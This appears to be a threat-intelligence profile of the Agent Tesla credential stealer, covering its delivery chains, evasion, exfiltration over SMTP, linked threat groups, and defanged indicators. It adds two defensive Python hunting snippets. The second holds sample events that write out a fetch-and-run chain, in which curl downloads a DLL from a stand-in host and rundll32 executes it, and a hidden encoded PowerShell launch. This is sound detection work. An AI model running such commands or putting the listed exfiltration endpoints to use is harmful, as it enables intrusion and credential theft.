Agent Tesla
Agent Tesla is a widely used Windows credential-stealing malware family, commonly described in public reporting as an infostealer/password stealer and in some cases credited with RAT-like surveillance features. It is frequently distributed through phishing and malspam campaigns, including malicious email attachments, archive-contained script loaders, PDF-linked phishing lures, and multi-stage .NET or script-based delivery chains. It is also delivered by other malware loaders and ecosystems, including GULoader and Amadey, and has been observed hosted on services such as Discord CDN. Reported targeting includes business users broadly, with specific campaigns aimed at finance users, organizations in Türkiye’s financial sector, the logistics sector in Asia, and Italian-language business-themed malspam campaigns; India-themed financial and tax lures were also seen on related infrastructure delivering Agent Tesla among other payloads.
Across the collected reporting, Agent Tesla is associated with credential theft from browsers, theft of session cookies and autofill data, clipboard theft, keylogging, screenshot capture, username collection, and exfiltration of stolen data. Some reports also state that Agent Tesla can access the victim’s webcam and record video. Exfiltration methods directly mentioned include SMTP, FTP, Telegram, and other channels; one AhnLab-cited sample used SMTP. Multiple reports describe modern Agent Tesla intrusion chains as heavily obfuscated and fileless or memory-resident, using PowerShell, Batch scripts, Base64-encoded commands, LOLBAS execution, rundll32 abuse, in-memory loading, and process hollowing into legitimate processes such as charmap.exe. Additional observed defense-evasion behaviors include anti-debugging, anti-sandbox and anti-VM checks, hidden windows via ProcessWindowStyle.Hidden, and creation of hidden folders.
The malware appears repeatedly in commodity cybercrime distribution ecosystems. GULoader has delivered Agent Tesla alongside NetWire, FormBook, NanoCore, Parallax RAT, Lumma, Vidar, and Remcos. Amadey botnet clusters have distributed Agent Tesla together with Lumma Stealer, Vidar Stealer, StealC, Rugmi, PureCrypter, Rhadamanthys Stealer, RedLine Stealer, SmokeLoader, XWorm, and AsyncRAT. Related infrastructure in other campaigns also delivered Phantom Stealer, DarkCloud, MassLogger variants, FormBook, XWorm, and Snake keyloggers.
High-confidence indicators and infrastructure explicitly tied to Agent Tesla in the collected reporting include SMTP exfiltration settings from Unit 42 analysis: hosting2[.]ro.hostsailor[.]com:587 with sender packagelog@gtpv[.]online and receiver package@gtpv[.]online; mail[.]gtpv[.]online:587 with sender kings@gtpv[.]online and receiver king@gtpv[.]online; nffplp[.]com:587 with sender airlet@nffplp[.]com and receiver smt.treat@yandex[.]com; and mail[.]iaa-airferight[.]com:25 with sender accounts admin@iaa-airferight[.]com and web@iaa-airferight[.]com. Sample hashes explicitly identified as Agent Tesla-related include SHA-256 ac5fc65ae9500c1107cdd72ae9c271ba9981d22c4d0c632d388b0d8a3acb68f4, 30b7c09af884dfb7e34aa7401431cdabe6ff34983a59bec4c14915438d68d5b0, and 5487845b06180dfb329757254400cb8663bf92f1eca36c5474e9ce3370cadbde. One phishing case identified by VirusTotal labeled the payload as an AgentTesla variant and described it as a credential and clipboard stealer.
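A small hunting helper for the SMTP exfiltration endpoints and sender addresses listed above, added here as an example rather than taken from the Unit 42 reporting or from Mallory. The indicators are kept defanged and refanged only at match time; the connection events, the Sysmon-shaped fields and the mail-client allowlist are constructed assumptions.

```python
from collections import namedtuple

# Agent Tesla SMTP exfiltration endpoints and sender accounts quoted on this page, kept defanged.
EXFIL_ENDPOINTS_DEFANGED = [
    "hosting2[.]ro.hostsailor[.]com:587",
    "mail[.]gtpv[.]online:587",
    "nffplp[.]com:587",
    "mail[.]iaa-airferight[.]com:25",
]
EXFIL_SENDERS_DEFANGED = ["packagelog@gtpv[.]online", "kings@gtpv[.]online",
                          "airlet@nffplp[.]com", "admin@iaa-airferight[.]com"]
SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allowlist for this example
NetConn = namedtuple("NetConn", "process dst_host dst_port")  # Sysmon EID 3-like shape (assumed)

def refang(ioc):
    """Turn defanged notation ([.] and hxxp) back into the literal value for matching."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def parse_endpoint(endpoint):
    host, _, port = refang(endpoint).rpartition(":")
    return host.lower(), int(port)

def suspicious_sender(smtp_log_line, senders=EXFIL_SENDERS_DEFANGED):
    """Return the known exfil sender address used in an SMTP log line, else None."""
    line = smtp_log_line.lower()
    return next((refang(s) for s in senders if refang(s).lower() in line), None)

def triage(conns, endpoints=EXFIL_ENDPOINTS_DEFANGED):
    """Flag connections to known exfil endpoints, then any non-mail-client process speaking SMTP."""
    known = {parse_endpoint(e) for e in endpoints}
    known_hosts = {host for host, _ in known}
    findings = []
    for c in conns:
        proc, host = c.process.lower(), c.dst_host.lower()
        if (host, c.dst_port) in known or host in known_hosts:
            findings.append((proc, host, c.dst_port, "known Agent Tesla SMTP exfil endpoint"))
        elif c.dst_port in SMTP_PORTS and proc not in MAIL_CLIENTS:
            findings.append((proc, host, c.dst_port, "non-mail-client process speaking SMTP"))
    return findings

SAMPLE_CONNS = [  # constructed sample; charmap.exe is the hollowed host process named above
    NetConn("charmap.exe", "mail.gtpv.online", 587),
    NetConn("outlook.exe", "smtp.office365.com", 587),
    NetConn("msedge.exe", "example.invalid", 443),
    NetConn("svchost.exe", "203.0.113.10", 25),
]
```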
Vulnerabilities exploited
7 CVEs Mallory has correlated with this family across public research and vendor advisories.
Instead of relying solely on exploiting unpatched document software as seen in past campaigns that heavily abused known Microsoft Office flaws such as CVE-2017-11882, CVE-2017-0199, and CVE-2018-0802, modern operators are utilizing highly deceptive script-based loaders. | In a recently observed attack, a routine-looking phishing email quietly triggered a full-scale malware compromise, showcasing an advanced Agent Tesla infection chain.
Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery. | Agent Tesla can collect account information from the victim’s machine. Agent Tesla has used HTTP for C2 communications. Agent Tesla has used SMTP for C2 communications.
...finally deploying stealer and cryptominer malware such as AgentTesla, rhajk, nasqa.
Associated Analytic Stories: AgentTesla, CVE-2023-21716 Word RTF Heap Corruption, Compromised Windows Host, FIN7, PlugX, Warzone RAT.
Groups observed using it
5 distinct threat actors attributed by public researchers.
...beginning in late 2021, Proofpoint observed this group begin using DiscordApp URLs linking to a compressed file which led to either AgentTesla or Imminent Monitor.
The info stealers most popular with SilverTerrier last year were LokiBot (446 unique samples/month), Pony (330 unique samples/month), and Agent Tesla .NET keylogger (95 unique samples/month).
The group relied exclusively on a variety of publicly available spyware and Remote Access Trojans (RATs), including AgentTesla, Lokibot, AzoRult, Pony, and NetWire.
"...families of RATs and infostealers. These included Lokibot, Betabot, Formbook, and AgentTesla."
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (3 techniques)
The user had opened an email 15 minutes before the alert. Subject line: “Outstanding Invoice — Action Required”. The attachment? A well-crafted PDF.
Execution (6 techniques)
This was classic LOLBAS (Living-Off-the-Land Binaries and Scripts) abuse...
msedge.exe
└── powershell.exe
    └── curl.exe
        └── downloaded.dll
            └── rundll32.exe
T1059.001 — PowerShell Execution: Malicious script executed via encoded PowerShell commands.
When the attached archive is extracted and opened, the heavily obfuscated Batch script springs into action.
Upon execution, these files kick off a multi-stage chain of extracting, deobfuscating, loading and executing secondary payloads (dynamic-link libraries), eventually detonating the final payload (executable).
Privilege Escalation (2 techniques)
Stealth (13 techniques)
They now employ heavily obfuscated scripts... When the attached archive is extracted and opened, the heavily obfuscated Batch script springs into action.
This article highlights a new obfuscation technique threat actors are using to hide malware through steganography within bitmap resources embedded in otherwise benign 32-bit .NET applications.
Process injection is a critical phase of this operation. By forcing a trusted application like charmap.exe to run the malicious code...
This technique, known as process hollowing, involves creating a new instance of the legitimate process in a suspended state, unmapping its original code, and injecting the malicious payload before resuming the process thread.
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
T1218.011 — Rundll32 Execution: Abused rundll32.exe to stealthily execute the malicious DLL.
Furthermore, the payload actively performs anti-sandbox DLL checks and enumerates system hardware to identify virtual machines (Anti-VM). If the code detects artifacts commonly associated with automated malware analysis systems... it abruptly halts execution.
Agent Tesla has created hidden folders. AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings. APT28 has saved files with hidden file attributes. FIN13 has created hidden files and folders within a compromised Linux system /tmp directory and also used attrib.exe to hide gathered local host information.
Agent Tesla has used ProcessWindowStyle.Hidden to hide windows. APT19 used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden. APT28 has used the WindowStyle parameter to conceal PowerShell windows.
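Detection logic for the behaviours described in the Execution and Stealth sections above (the msedge → powershell → rundll32 LOLBAS chain, encoded PowerShell commands, and hidden-window flags), added here as an example that is not taken from Mallory or from the cited reports. The process-creation events are constructed in a Sysmon EID 1-like shape, and the benign stand-in script behind -EncodedCommand is an assumption.

```python
import base64
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # Sysmon EID 1 / 4688 shape (assumed)
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)  # any unambiguous prefix
HIDDEN_FLAG = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)

def decode_encoded_command(cmdline):
    """UTF-16LE script behind -EncodedCommand, or None if absent or not valid base64."""
    m = ENCODED_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def ancestry(ev, by_pid):
    """Image names from ev up to the root; `seen` guards against pid-reuse cycles."""
    chain, seen = [], set()
    while ev and ev.pid not in seen:
        seen.add(ev.pid)
        chain.append(ev.image.lower())
        ev = by_pid.get(ev.ppid)
    return chain

def hunt(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = e.image.lower()
        if img == "powershell.exe":
            if HIDDEN_FLAG.search(e.cmdline):
                findings.append((e.pid, "hidden-window powershell"))
            decoded = decode_encoded_command(e.cmdline)
            if decoded is not None:
                findings.append((e.pid, "encoded powershell: " + decoded))
        elif img == "rundll32.exe":
            chain = ancestry(e, by_pid)  # e.g. rundll32 <- powershell <- msedge
            if {"powershell.exe", "cmd.exe"} & set(chain[1:]):
                findings.append((e.pid, "rundll32 under script chain: " + " <- ".join(chain)))
    return findings

# Constructed sample mirroring the msedge -> powershell -> curl/rundll32 chain described above.
ENC = base64.b64encode("Write-Host hi".encode("utf-16-le")).decode()  # benign stand-in script
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "msedge.exe", "msedge.exe"),
    ProcEvent(200, 100, "powershell.exe", "powershell.exe -W Hidden -enc " + ENC),
    ProcEvent(300, 200, "curl.exe", r"curl.exe -o C:\Users\u\AppData\Local\Temp\downloaded.dll https://example.invalid/x"),
    ProcEvent(400, 200, "rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Local\Temp\downloaded.dll,Start"),
]
```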
Credential Access (4 techniques)
Additionally, it features a persistent keylogger that records every keystroke, ensuring that even newly typed passwords are captured.
It aggressively targets sensitive information, sweeping the compromised system to steal browser credentials, session cookies, and saved auto-fill data.
Discovery (5 techniques)
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
Collection (4 techniques)
The malware frequently captures screenshots of the active desktop, providing the attackers with real-time visual context of the victim’s activities.
Command and Control (2 techniques)
Exfiltration (2 techniques)
IOCs tracked for this family
845 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Agent Tesla is mentioned as a payload distributed by a large botnet cluster within the Amadey ecosystem.
Infostealer referenced as a prior example used in stealer-log analysis.
Additional payload observed on the same delivery infrastructure, indicating a loader-as-a-service operation where final payloads vary.
A remote access trojan/tool mentioned as a payload commonly delivered by GULoader, potentially enabling full remote control of the victim machine.